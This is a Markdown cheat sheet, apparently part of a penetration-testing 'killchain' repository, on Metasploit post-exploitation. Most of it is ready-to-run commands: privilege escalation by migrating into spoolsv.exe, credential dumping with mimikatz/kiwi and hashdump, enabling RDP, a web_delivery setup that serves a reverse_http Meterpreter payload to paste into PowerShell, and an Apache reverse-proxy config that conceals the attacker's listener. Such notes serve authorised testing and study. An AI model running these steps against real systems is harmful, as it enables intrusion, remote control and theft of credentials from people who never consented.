killchain-compendium/post exploitation/docs/metasploit.md

1.8 KiB

Metasploit

  • -j Run job in background
  • sessions -i 1 interactive session 1

Meterpreter

post/multi/manage/shell_to_meterpreter
  • execute command
  • search files
  • download and upload files

Metasploit after gaining foothold

  • Meterpreter shell is opened on target. Run exploit suggester
run post/multi/recon/local_exploit_suggester
  • Decide on your exploit and background the meterpreter.
  • Use the exploit.
use <path/to/exploit>
  • Fill options like session and run the exploit

Privilege Escalation on Windows Using Metasploit

  • Find process with higher privs and migrate to it. Example spoolsv.exe.
migrate -N spoolsv.exe
  • After NT AUTHORITY\SYSTEM is gained start mimikatz. and dump all creds
load kiwi
help
creds_all
  • Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

  • Meterpreter
run post/windows/gather/hashdump
load kiwi
lsa_dump_sam

Webdelivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
  • Copy into powershell/cmd

Reverse Proxy

  • Hide behind reverse proxy, e.g. apache
  • In case of an apache, these modules must be enabled
    • rewrite
    • proxy
    • proxy_http
    • headers
  • Use User-Agent to identify targets
<VirtualHost *:80>

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	RewriteEngine On
	RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
	ProxyPass "/" "http://localhost:8080/"

	<Directory>
		AllowOverride All
	</Directory>

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>